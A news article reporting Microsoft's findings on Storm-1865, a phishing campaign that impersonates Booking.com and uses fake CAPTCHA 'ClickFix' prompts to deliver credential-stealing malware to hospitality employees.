Article Details

That 'angry guest' email from Booking.com? It's a scam, not a 1-star review. Phishers check in, your credentials check out, Microsoft warns. An ongoing phishing campaign disguised as a Booking.com email casts keystroke and credential-stealing malware into hospitality employees' inboxes for financial fraud and theft, according to Microsoft Threat Intelligence. Redmond says the email attacks began in December, and were still happening as of February. The threat intel team attributes the campaign to a group it tracks as Storm-1865, which in 2023 used a similar Booking.com themed-lure and social engineering techniques to target hotel guests, and last year targeted e-commerce platform buyers. "These campaigns have been ongoing with increased volume since at least early 2023 and involve messages sent through vendor platforms, such as online travel agencies and e-commerce platforms, and email services, such as Gmail or iCloud Mail," according to a Thursday report that, oddly enough, doesn't name-drop Exchange or other Microsoft email services. The latest credential-stealing attempts specifically target hospitality employees that likely work with Booking.com in North America, Oceania, South and Southeast Asia, and across the continent of Europe.  While all of the emails impersonate the online travel agency, their content varies and they sometimes mention negative hotel guest reviews or requests from prospective travelers, or online promotion opportunities and account verification – anything to prompt a gut-reaction click from the perons opening the email before they get a chance to consider the message's origins. These emails include a link or PDF attachment with a link in the document, and you can probably guess what happens next. The link claims to take whoever clicks on it to Booking.com, but instead leads to an attacker-controlled website with a fake CAPTCHA puzzle. The phony CAPTCHA uses the ClickFix social engineering technique. This is where an attacker displays a fake error message instructing the user to fix the issue by copying and pasting a command that ultimately downloads malware to the victim's device. This type of user interaction means the malicious code is more likely to bypass built-in security features. In this particular phishing campaign, the attackers prompt the user to use a keyboard shortcut and open Windows Run, and then paste a command that downloads and launches malware: This campaign delivers multiple families of commodity malware, including XWorm, Lumma stealer, VenomRAT, AsyncRAT, Danabot, and NetSupport RAT. Depending on the specific payload, the specific code launched through mshta.exe varies. Some samples have downloaded PowerShell, JavaScript, and portable executable (PE) content. All of these payloads can steal credentials and financial data, which Microsoft says is one of Storm-1865's trademarks. "Storm" is how Microsoft tracks groups that are still in development (along the line of how Russian groups all have "Blizzard" in their name and Chinese groups are "Typhoons"). Storm-1865, we're told, includes a cluster of phishing attacks leading to financial fraud. A Microsoft spokesperson declined to answer The Register's questions including the geographic region where Storm-1865 attacks originate and whether its activity overlaps with any other threat groups that Redmond is tracking. The spokesperson also declined to tell us how many organizations have been affected by this latest Booking.com phishing campaign.